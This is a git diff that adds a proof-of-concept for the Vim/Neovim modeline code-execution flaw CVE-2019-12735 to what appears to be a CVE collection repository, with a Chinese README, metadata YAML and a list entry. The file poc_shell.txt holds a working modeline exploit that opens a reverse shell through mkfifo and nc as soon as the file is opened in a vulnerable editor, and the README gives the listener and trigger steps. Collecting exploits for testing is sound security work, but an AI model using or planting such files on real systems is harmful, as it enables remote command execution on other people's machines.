diff --git a/cve/vim/2019/CVE-2019-12735/README.md b/cve/vim/2019/CVE-2019-12735/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..fc10ae4194e348d3379bc7ef5cb901db8f9a5043
--- /dev/null
+++ b/cve/vim/2019/CVE-2019-12735/README.md
@@ -0,0 +1,13 @@
+# Vim/Neovim通过Modelines执行任意代码
+Vim/Neovim Arbitrary Code Execution via Modelines (CVE-2019-12735)
+
+# 概念验证
+1. listen
+```
+nc -vlp 9999
+```
+2.  确保set modeline选项未被禁用。在 Vim 中打开文件
+```
+vim poc_shell.txt
+```
+之后系统将得到一个shell。
diff --git a/cve/vim/2019/CVE-2019-12735/poc_shell.txt b/cve/vim/2019/CVE-2019-12735/poc_shell.txt
new file mode 100644
index 0000000000000000000000000000000000000000..ffc36b5a5e8acf75d624f8cac4d42ab6d24e0662
--- /dev/null
+++ b/cve/vim/2019/CVE-2019-12735/poc_shell.txt
@@ -0,0 +1 @@
+:!rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1  9999 >/tmp/f||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
diff --git a/cve/vim/2019/CVE-2019-12735/poc_uname.txt b/cve/vim/2019/CVE-2019-12735/poc_uname.txt
new file mode 100644
index 0000000000000000000000000000000000000000..2cf5405f30bad495c8ecc5a42bb9e2eae192462f
--- /dev/null
+++ b/cve/vim/2019/CVE-2019-12735/poc_uname.txt
@@ -0,0 +1 @@
+:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
diff --git a/cve/vim/2019/yaml/CVE-2019-12735.yaml  b/cve/vim/2019/yaml/CVE-2019-12735.yaml 
new file mode 100644
index 0000000000000000000000000000000000000000..a40bdd8a74bbc85e569f60c24c2bdf064df4e985
--- /dev/null
+++ b/cve/vim/2019/yaml/CVE-2019-12735.yaml 	
@@ -0,0 +1,22 @@
+id: CVE-2019-12735
+source: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md
+info:
+  name: Vim是一款跨平台的文本编辑器。
+  severity: high
+  description: |
+    该漏洞存在于编辑器的 modeline功能，部分 Linux 发行版默认启用了该功能，macOS 是没有默认启用。据发现，`:source!`命令不受sandbox的限制。如果明确启用Modeline，那么在VIM中打开巧尽心思构建的文本文件，可能导致任意命令执行。
+  scope-of-influence:
+    Vim < 8.1.1365
+    Neovim < 0.3.6 
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-12735
+    - https://access.redhat.com/errata/RHSA-2019:1619
+    - http://www.securityfocus.com/bid/108724
+  classification:
+    cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
+    cvss-score: 8.6
+    cve-id: CVE-2019-12735
+    cwe-id: CWE-78
+    cnvd-id: None
+    kve-id: None
+  tags: OS Command Injection, cve2019
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 5a8b7367b6465e9d0e9c24f102c47dfafcf732cc..f418b9e500b7e4ad25182d938f56a7aa67904bc0 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -60,6 +60,7 @@ cve:
   polkit:
     - CVE-2021-4034
   vim:
+    - CVE-2019-12735
     - CVE-2021-3778
     - CVE-2022-0351
     - CVE-2022-0359